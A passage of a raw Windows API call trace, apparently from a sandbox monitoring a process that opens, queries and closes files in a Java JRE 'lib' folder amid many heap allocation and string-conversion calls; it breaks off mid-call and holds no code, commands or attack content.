[0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0097.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0097.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0097.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0097.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0097.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0097.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0097.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0097.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0097.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0097.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0097.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0097.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.558] AreFileApisANSI () returned 1 [0097.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template", lpUsedDefaultChar=0x0) returned 68 [0097.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0097.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0097.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0097.558] AreFileApisANSI () returned 1 [0097.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0097.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82298 [0097.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x82298, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 68 [0097.558] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.651] GetFileType (hFile=0x33c) returned 0x1 [0097.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82298 | out: hHeap=0x20000) returned 1 [0097.651] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.652] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.652] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.652] CloseHandle (hObject=0x33c) returned 1 [0097.655] AreFileApisANSI () returned 1 [0097.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0097.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82448 [0097.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x82448, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 68 [0097.655] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.656] GetFileType (hFile=0x33c) returned 0x1 [0097.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82448 | out: hHeap=0x20000) returned 1 [0097.656] CloseHandle (hObject=0x33c) returned 1 [0097.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.657] AreFileApisANSI () returned 1 [0097.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0097.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82298 [0097.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x82298, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 68 [0097.658] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd30)) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82298 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0097.658] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.658] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.658] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x86, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8a798, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x86, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\m", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ര")) returned 0 [0097.658] FindClose (in: hFindFile=0x78010 | out: hFindFile=0x78010) returned 1 [0097.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0097.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0097.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0097.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0097.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0097.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0097.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0097.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0097.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0097.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0097.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0097.659] AreFileApisANSI () returned 1 [0097.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar", lpUsedDefaultChar=0x0) returned 60 [0097.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0097.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.659] AreFileApisANSI () returned 1 [0097.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0097.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 60 [0097.659] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.660] GetFileType (hFile=0x360) returned 0x1 [0097.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0097.660] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.660] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.660] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.660] CloseHandle (hObject=0x360) returned 1 [0097.660] AreFileApisANSI () returned 1 [0097.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0097.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 60 [0097.661] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.661] GetFileType (hFile=0x360) returned 0x1 [0097.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.661] CloseHandle (hObject=0x360) returned 1 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.662] AreFileApisANSI () returned 1 [0097.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a630 [0097.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 60 [0097.662] GetFileAttributesExW (in: 